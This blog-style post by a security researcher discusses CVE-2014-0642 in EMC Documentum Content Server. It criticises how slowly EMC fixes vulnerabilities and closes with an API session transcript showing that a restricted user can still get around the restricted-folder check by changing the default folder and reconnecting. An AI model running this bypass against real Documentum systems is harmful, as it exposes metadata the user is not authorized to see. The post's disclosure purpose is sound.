On April 10, 2014 EMC announced CVE-2014-0642:
EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.
The researcher of this vulnerability is Yuri Simione, he is even going to publish “exploit” (however it took 10 minutes for me to understand how to exploit vulnerability, but I’m not going to publish any related information). Initially I was confused by the following thing: Yuri writes that he discovered vulnerability in January 2014, EMC has written that vulnerability is fixed in CS7.1SP2 (released on March 1, 2014), so it takes just one month to fix vulnerability (note that usage of restricted folders feature causes wrong results for some queries). EMC is trying to fix multiple XSRFs more than year and still does not get any success, privilege escalation vulnerabilities was discovered by me in November 2013 and those vulnerabilities are still not fixed, but it’s worth to fix low-impact vulnerabilities within a month, what a shame!
But today I realized that EMC actually didn’t fix anything, to demonstrate this fact I’m not going to use any SQL injections and/or undocumented rpc-commands, just simple API and my knowledge about security model:
API> retrieve,c,dm_user where user_name=USER ... 1102242880000143 API> get,c,l,user_name ... dmc_wdk_presets_owner API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND) [DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH]error: "You have specified a folder path ( '/Temp' ) that is not a folder (or subfolder of a folder) in the user's restricted_folder_ids." API> get,c,l,default_folder ... /Resources/Registry/Presets/Webtop API> values,c,l,restricted_folder_ids ... 4 API> get,c,l,restricted_folder_ids ... 0c02242880000130 API> get,c,l,restricted_folder_ids ... 0c02242880000106 API> get,c,l,restricted_folder_ids ... 0c02242880000130 API> get,c,l,restricted_folder_ids ... 0c02242880000106 API> get,c,0c02242880000130,r_folder_path ... /Resources API> get,c,0c02242880000106,r_folder_path ... /System API> set,c,l,default_folder SET> /Temp ... OK API> save,c,l ... [DM_FOLDER_E_PATH_EXISTS]error: "Cannot save (or link) 'Temp' folder with path name '/Temp' because one already exists." ^^^ we are going to ignore this error API> connect,xcp21,dmc_wdk_presets_owner,webtop ... s1 API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND) count(*) ---------------------- 792 (1 row affected)